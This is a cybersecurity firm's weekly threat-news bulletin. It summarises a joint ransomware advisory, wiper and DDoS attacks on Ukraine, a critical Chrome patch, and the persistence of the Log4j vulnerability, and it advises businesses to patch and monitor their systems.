Welcome to the latest edition of the Neu Cyber Threats, a weekly series in which we bring attention to the latest cyber attacks and threats including Ransomware and DDoS, in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:

 

Ransomware surge prompts joint NCSC, CISA warning to safeguard systems

An increase in “sophisticated, high-impact” ransomware incidents is posing a growing threat to critical infrastructure organisations, western government agencies warn.

The UK’s National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), and the Australian Cyber Security Centre published a joint advisory (PDF) on recently highlighted the evolution of techniques deployed by cybercriminals and the growing maturity of the ransomware-as-a-service business model.

In their advisory, the agencies report that ransomware peddlers have begun sharing victim information with each other, diversifying the threat to targeted organisations:

For example, after announcing its shutdown, the BlackMatter ransomware group transferred its existing victims to infrastructure owned by another group, known as Lockbit 2.0. In October 2021, Conti ransomware actors began selling access to victims’ networks, enabling follow-on attacks by other cyber threat actors.

Ransomware groups have increased their impact by targeting managed service and cloud infrastructure providers, according to the NCSC and other members of the Five Eyes intel sharing alliance.

“Ransomware developers targeted cloud infrastructures to exploit known vulnerabilities in cloud applications, virtual machine software, and virtual machine orchestration software,” according to the joint advisory.

“Ransomware threat actors also targeted cloud accounts, cloud application programming interfaces (APIs), and data backup and storage systems to deny access to cloud resources and encrypt data.”

Chris Boyd, senior threat researcher at Malwarebytes, commented: “The shift away from so-called ‘big-game’ targets to smaller entities because of generating too much heat from major ransomware outbreaks could spell trouble for SMEs, as ransomware groups redouble their efforts on organisations which may not have the security budget to withstand sustained, aggressive attacks.”

UK and Australian organisations reported that enterprises of all sizes continue to be targeted with ransomware attacks.

Industry representatives told The Daily Swig that Hive, Sodinokibi (AKA REvil), Conti, Phobos, and Khonsari are among the most common ransomware strains by volume at present.

“In terms of volume/in-field submissions these are the top five, but bear in mind some of the big game hunters will not have the volume,” Raj Samani, chief scientist at Trellix, explained.

In their joint advisory, intel agencies offer guidance on preventing attacks. This includes segmenting networks, making regular backups, patching, network monitoring, and tightening authentication controls, among other security enhancements.

In addition to this advice, Neuways would recommend working with an external Cyber Security resource that has expert knowledge of the latest threats and the techniques which must be implemented to protect against them.

‘Wiper’ attack discovered in latest Ukraine cyber-attacks

Ukraine has been hit by more cyber-attacks, which its government says are “on a completely different level”.

Earlier last week, the websites of several Ukrainian banks and government departments became inaccessible. At the same time, a new “wiper” attack, which destroys data on infected machines, was discovered being used against Ukrainian organisations.

The incident represents the third wave of attacks against Ukraine this year and the most sophisticated to date. The latest attack began on Wednesday afternoon when internet connectivity company NetBlocks tweeted about the outages, saying, “the incident appears consistent with recent DDoS attacks”.

Distributed denial of service (DDoS) attacks are designed to knock a website offline by flooding it with huge amounts of requests until it crashes.

There are continuing reports from Ukraine that mass DDoS attacks on the country have begun with NetBlocks data suggesting them intensifying in severity.

It is important to say that no official blame has been directed at Russia for the latest attacks, and most websites were restored within a few hours.

On Wednesday night, cyber-security experts at ESET and Symantec then said they had recorded a second form of attack on computer systems using a sophisticated “wiper” malware. “ESET researchers have announced the discovery of a new data wiper malware used in Ukraine, which they have named HermeticWiper,” a spokesman said.

“ESET telemetry shows that the malware was installed on hundreds of machines in the country.”

The US, UK and EU have also blamed Russia for the hugely disruptive NotPetya “wiper” attack, which started in Ukraine but spread globally, causing billions of dollars of damage to computer systems across Europe, Asia, and the Americas.

Moscow denies being behind the attack, calling such claims “Russophobic”, but Neuways, and the National Cyber Security Centre would advise businesses to continue to be vigilant against the growing cyber threat across the world. Cyber resilience and cyber security must be a priority for every organisation now and in the future.

Google Patches Critical Vulnerability With Chrome 99 Update

A Chrome 99 update released by Google on Tuesday (16th March) patches a critical vulnerability discovered by one of the company’s own researchers. The critical flaw tracked as CVE-2022-0971, has been described as a use-after-free issue affecting the Blink Layout component.

Google doesn’t often assign a “critical severity” rating to Chrome vulnerabilities. In fact, over the past year, only four other Chrome updates fixed a critical issue. Two of the four critical vulnerabilities were discovered by Glazunov, who has also identified a high-severity bug that was patched this week.

The latest Chrome update includes 11 security fixes, including eight with a “high severity” rating. These flaws, which can typically allow a sandbox escape or remote code execution, are mostly use-after-free issues.

The internet giant said that it paid out nearly £8 million in bug bounties last year, including roughly £2.7 million for Chrome vulnerabilities.

There has been a surge in Chrome vulnerabilities exploited in the wild, with 14 zero-days exploited in 2021, far more than any other popular web browser.

Google last week attempted to explain this trend, naming several factors that have apparently contributed. The list includes more transparency regarding active exploitation, increased complexity of the browser, the need to chain multiple flaws for a useful exploit, and attackers increasingly targeting the browser itself following the death of Flash, their former favourite target.

Again, patching is an ever-evolving task, and that isn’t going to change anytime soon. Businesses (and users) need to make a cultural shift towards patch management being a day-to-day activity, just as phishing awareness training is now becoming part of the daily job of every employee in order to ensure a company’s cyber resilience.

Log4j bug will be with us for years

December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. On 9th December, a remote code execution vulnerability [CVE-2021-44228] was uncovered in the programming library named Log4j, which is nearly ubiquitous in Java applications and software used all across the internet.

It felt like this vulnerability affected, well, everything. On top of that, it was very difficult to determine what applications were vulnerable and from what entry point.

The CVE-2021-44228 Log4j vulnerability offers initial access, which means hackers can then perform all the disruption, degradation and potential destruction they wish. Coupled with other vulnerabilities and exploitation techniques, even more damage could be done.

One particular vulnerability, which occurred recently, was the CVE-2021-4034 “PwnKit” bug affecting the PolKit pkexec utility, is of note. It was present on a significant number of Linux distributions and easily elevated any low-privilege users to root and administrator access. Weaponising both the trivial Log4j vulnerability for initial access, as well as the trivial pkexec vulnerability for privilege escalation, could lead to easy mass compromise of Linux servers if they are not patched.

Needless to say, patching was, is and always will be the utmost priority. In the case of Log4j, some individuals thought that using an up-to-date version of Java, rather than the individual Log4j library would be enough. This was quickly proved to not be the case, and the attack chain was made publicly available in the JNDI-Exploit-Kit project on GitHub.

If the vulnerable Log4 library is not patched, there is still a risk, even if initial access is not possible. The syntax used to pull off the attack relies on an outbound connection, reaching out via the LDAP protocol to retrieve a Java class hosted elsewhere. In this outbound connection request, the attacker could exfiltrate sensitive information potentially stored in environment variables.

As the cybersecurity industry moves through 2022, the Log4j nightmare feels like it might be confined to the annuals of history, but it’s not quite behind us just yet.

Most cyber security experts believed that after applying a patch or two to the previous Microsoft Exchange vulnerability, ProxyLogon would disappear. But almost instantly, the threat actors flung ProxyShell at us, taking many by surprise. And while ProxyShell/ProxyLogon ended up not being quite as significant as Log4shell, these vulnerabilities still prove that threat actors love to recycle and level up a good threat whenever they can.

Considering just how deeply embedded the use of the Log4j package could be within applications, this vulnerability could continue to rear its head for many years to come. Much like the old Shellshock bug, some vendors or software providers might not even know the issue exists until it is discovered externally somewhere down the road.

Neuways urges businesses to ensure all patches are up to date and installed and that cyber security and cyber resilience measures are under constant review.

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.